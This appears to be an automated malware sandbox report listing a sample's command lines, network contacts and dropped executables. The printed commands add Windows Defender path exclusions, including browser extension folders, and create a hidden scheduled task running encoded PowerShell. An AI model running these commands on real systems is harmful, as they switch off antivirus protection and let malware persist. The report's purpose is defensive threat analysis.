"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RKrrVaXXRkyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RKrrVaXXRkyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SyLYnxBDrvwnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SyLYnxBDrvwnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jnZuMDLgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jnZuMDLgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prPmKzeVCFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prPmKzeVCFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YNmVtKIhxUNsrgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YNmVtKIhxUNsrgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LVCnHeNtpGpwKZds\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LVCnHeNtpGpwKZds\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SyLYnxBDrvwnC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SyLYnxBDrvwnC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jnZuMDLgU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jnZuMDLgU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prPmKzeVCFUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prPmKzeVCFUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YNmVtKIhxUNsrgVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YNmVtKIhxUNsrgVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LVCnHeNtpGpwKZds /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LVCnHeNtpGpwKZds /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gNeYrIDgN" /SC once /ST 05:31:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gNeYrIDgN"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 206.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 45.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 cczhk.com udp
US 8.8.8.8:53 294down-river.sbs udp
US 104.21.67.206:80 294down-river.sbs tcp
PA 200.46.202.73:80 cczhk.com tcp
DE 185.172.128.127:80 185.172.128.127 tcp
US 8.8.8.8:53 def.bestsup.su udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 acenitive.shop udp
US 8.8.8.8:53 monoblocked.com udp
RU 147.45.47.101:80 147.45.47.101 tcp
US 8.8.8.8:53 cleued.com udp
US 8.8.8.8:53 medfioytrkdkcodlskeej.net udp
US 104.21.67.206:443 294down-river.sbs tcp
US 172.67.171.112:80 def.bestsup.su tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 104.21.4.60:80 cleued.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 188.114.96.2:80 acenitive.shop tcp
US 188.114.96.2:80 acenitive.shop tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 8.8.8.8:53 206.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 73.202.46.200.in-addr.arpa udp
US 8.8.8.8:53 127.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 112.171.67.172.in-addr.arpa udp
US 8.8.8.8:53 60.4.21.104.in-addr.arpa udp
US 8.8.8.8:53 101.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 164.137.240.87.in-addr.arpa udp
US 8.8.8.8:53 209.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 108.41.130.45.in-addr.arpa udp
PA 200.46.202.73:80 cczhk.com tcp
US 8.8.8.8:53 triedchicken.net udp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 188.114.96.2:80 acenitive.shop tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 188.114.96.2:80 acenitive.shop tcp
US 104.21.4.60:80 cleued.com tcp
US 172.67.180.119:80 triedchicken.net tcp
US 172.67.180.119:80 triedchicken.net tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 172.67.180.119:80 triedchicken.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 172.67.180.119:443 triedchicken.net tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 91.215.85.209:443 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 188.114.96.2:80 acenitive.shop tcp
US 188.114.96.2:80 acenitive.shop tcp
US 104.21.4.60:80 cleued.com tcp
US 188.114.96.2:443 acenitive.shop tcp
US 188.114.96.2:443 acenitive.shop tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 104.21.4.60:443 cleued.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 pergor.com udp
US 172.67.156.81:443 pergor.com tcp
GB 2.19.169.32:80 x2.c.lencr.org tcp
US 8.8.8.8:53 119.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 81.156.67.172.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 carthewasher.net udp
US 104.21.82.182:443 carthewasher.net tcp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 182.82.21.104.in-addr.arpa udp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 632432.site udp
US 8.8.8.8:53 sun6-21.userapi.com udp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 sun6-22.userapi.com udp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
NL 194.104.136.64:443 632432.site tcp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 psv4.userapi.com udp
RU 87.240.190.89:443 psv4.userapi.com tcp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 sun6-20.userapi.com udp
NL 95.142.206.0:443 sun6-20.userapi.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
NL 95.142.206.0:443 sun6-20.userapi.com tcp
US 8.8.8.8:53 1.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 2.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 64.136.104.194.in-addr.arpa udp
US 8.8.8.8:53 89.190.240.87.in-addr.arpa udp
US 8.8.8.8:53 0.206.142.95.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 iplis.ru udp
US 172.67.147.32:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 32.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
DE 185.172.128.24:80 185.172.128.24 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 8.8.8.8:53 24.128.172.185.in-addr.arpa udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
RU 193.233.132.67:50505 tcp
US 8.8.8.8:53 67.132.233.193.in-addr.arpa udp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 villagemagneticcsa.fun udp
US 8.8.8.8:53 healthproline.pro udp
US 8.8.8.8:53 api.myip.com udp
US 188.114.97.2:443 healthproline.pro tcp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 chocolatedepressofw.fun udp
US 8.8.8.8:53 130.147.105.77.in-addr.arpa udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 prescriptionstorageag.fun udp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 theoryapparatusjuko.fun udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 snuggleapplicationswo.fun udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 8.8.8.8:53 smallrabbitcrossing.site udp
US 188.114.96.2:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 punchtelephoneverdi.store udp
US 8.8.8.8:53 telephoneverdictyow.site udp
RU 193.233.132.49:53 strainriskpropos.store udp
RU 193.233.132.49:53 associationokeo.shop udp
US 104.21.10.242:443 associationokeo.shop tcp
RU 193.233.132.49:53 49.132.233.193.in-addr.arpa udp
RU 193.233.132.49:53 242.10.21.104.in-addr.arpa udp
DE 77.105.147.130:80 77.105.147.130 tcp
NL 195.20.16.46:80 195.20.16.46 tcp
RU 193.233.132.49:53 t.me udp
NL 195.20.16.46:80 195.20.16.46 tcp
US 8.8.8.8:53 t.me udp
RU 193.233.132.49:53 46.16.20.195.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
DE 142.132.224.223:9001 142.132.224.223 tcp
US 8.8.8.8:53 223.224.132.142.in-addr.arpa udp
DE 142.132.224.223:9001 142.132.224.223 tcp
DE 142.132.224.223:9001 142.132.224.223 tcp
US 8.8.8.8:53 iplis.ru udp
US 104.21.63.150:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
DE 142.132.224.223:9001 142.132.224.223 tcp
US 8.8.8.8:53 150.63.21.104.in-addr.arpa udp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
RU 5.42.65.31:48396 tcp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 31.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 sjyey.com udp
MX 201.119.110.201:80 sjyey.com tcp
MX 201.119.110.201:80 sjyey.com tcp
US 8.8.8.8:53 201.110.119.201.in-addr.arpa udp
MX 201.119.110.201:80 sjyey.com tcp
MX 201.119.110.201:80 sjyey.com tcp
MX 201.119.110.201:80 sjyey.com tcp
MX 201.119.110.201:80 sjyey.com tcp
US 8.8.8.8:53 1ea84d9c-98da-4805-a5de-9748a9882c91.uuid.statsexplorer.org udp
RU 193.233.132.49:53 sjyey.com udp
US 8.8.8.8:53 sjyey.com udp
KR 211.168.53.110:80 sjyey.com tcp
US 8.8.8.8:53 110.53.168.211.in-addr.arpa udp
KR 211.168.53.110:80 sjyey.com tcp
KR 211.168.53.110:80 sjyey.com tcp
KR 211.168.53.110:80 sjyey.com tcp
US 8.8.8.8:53 server14.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun1.l.google.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
NL 74.125.128.127:19302 stun1.l.google.com udp
BG 185.82.216.108:443 server14.statsexplorer.org tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 127.128.125.74.in-addr.arpa udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp

Files

memory/1136-0-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-1-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-2-0x00007FFFB65A0000-0x00007FFFB6869000-memory.dmp

memory/1136-3-0x00007FFFB7480000-0x00007FFFB753E000-memory.dmp

memory/1136-4-0x00007FFFB65A0000-0x00007FFFB6869000-memory.dmp

memory/1136-5-0x00007FFF80000000-0x00007FFF80002000-memory.dmp

memory/1136-6-0x00007FFF80030000-0x00007FFF80031000-memory.dmp

memory/1136-7-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-8-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-9-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-10-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-11-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-12-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-13-0x00007FFFB8A30000-0x00007FFFB8C25000-memory.dmp

C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe

MD5 852f8672ad668dbef934f55b4d098973
SHA1 75713a5a598e5eccb863f6670ff4e5738058a64e
SHA256 5bd8c1d6809b1605876dc47c8a04312ebbbb7fc5d443ea81b1e3665c2fc34428
SHA512 5dadb891221cf37f451e563e775f793146c549390f1cd8524462f000b4ccc7337451997f00f089082674744ba9cd9a387615394f7428f48b69c429587ede0426

C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe

MD5 08ae943738a43f39ca279a003fa3e4a2
SHA1 b84294ead8a676e75064419062a84ffac825b8d5
SHA256 da9835d067dae3fafa046036707ecbabf4b6920091568266f1af3f1072469d74
SHA512 575a23ee68bbc21915f280d65515fcfccdeaf57f9d74af8e747b33bc50f66bf4ecdb15c13164275bd20e4fd6ec6bd16e614b7965f379b924ff5f7fca3147b742

memory/1136-44-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe

MD5 43abfd80cbfe8afaa65961856640efc4
SHA1 71614b90bb167b289d6d01d3768727eb6ac61ec5
SHA256 f125414e6c33771e07ed5b186e765c5c7cbab090deee72d70af657f1b4abf691
SHA512 bf84a17d811fcd20602a49121731399517e327cf5b1af015d1967af7d741c1b1b03219da0d62b1d9f8abdd800ef7edca83acb7ca909deffdc5023853ea8b540e

C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe

MD5 e654823683cb9be41044f5a800be69fd
SHA1 d43214c03a47f3b0c77a82eca775d702eaa025e8
SHA256 68abca4995919db0fe3a4e9158062759b2267ebcd8e3036f7eb8e71ed6202c85
SHA512 d20b18482b8f85bfa887495275712527939b388f912eac2388b2c446d4370a87118c01482898316b943667b2525b9b089d44e8e693cc6c5a6d9355ab2d9e6bcc

C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe

MD5 631393c67cb220cf18796dec2314c118
SHA1 751638c8a1b070b354231a2fd4283f02f303ca94
SHA256 e98c24e3639daa42b133774bce94eb385d68b2a81be6fe460c997c5be900a600
SHA512 b41105af3663da05fd2382735aede37da71a5d85ba1051a7fba03f6beeb556d842015e9977171de3285d7bbe47a41200db8de9748c3b4629d342d013593c07d6

C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe

MD5 a6b7675ef59c1f70955db3b35a908ba5
SHA1 4651853419533386ca296714a0ef4f0b69993ed7
SHA256 3b3dd4ca3ccb3efb70ff120ec887f84927eef73f324028730d7942bf279dab69
SHA512 7bd39cc3ef5f555a96e3d7cdb7ead3c419a5a219fbe3bf30a5f2017e2ea8ba1815ecc7ff0b51cde7d21b8d0e2c24bbf84742351ee4cb2b30df0f22e529879c04

C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe

MD5 61b46e3330294cfb1f16aebffead19a7
SHA1 8171ae0853f7d0c9eac8821e3b345c8617d52864
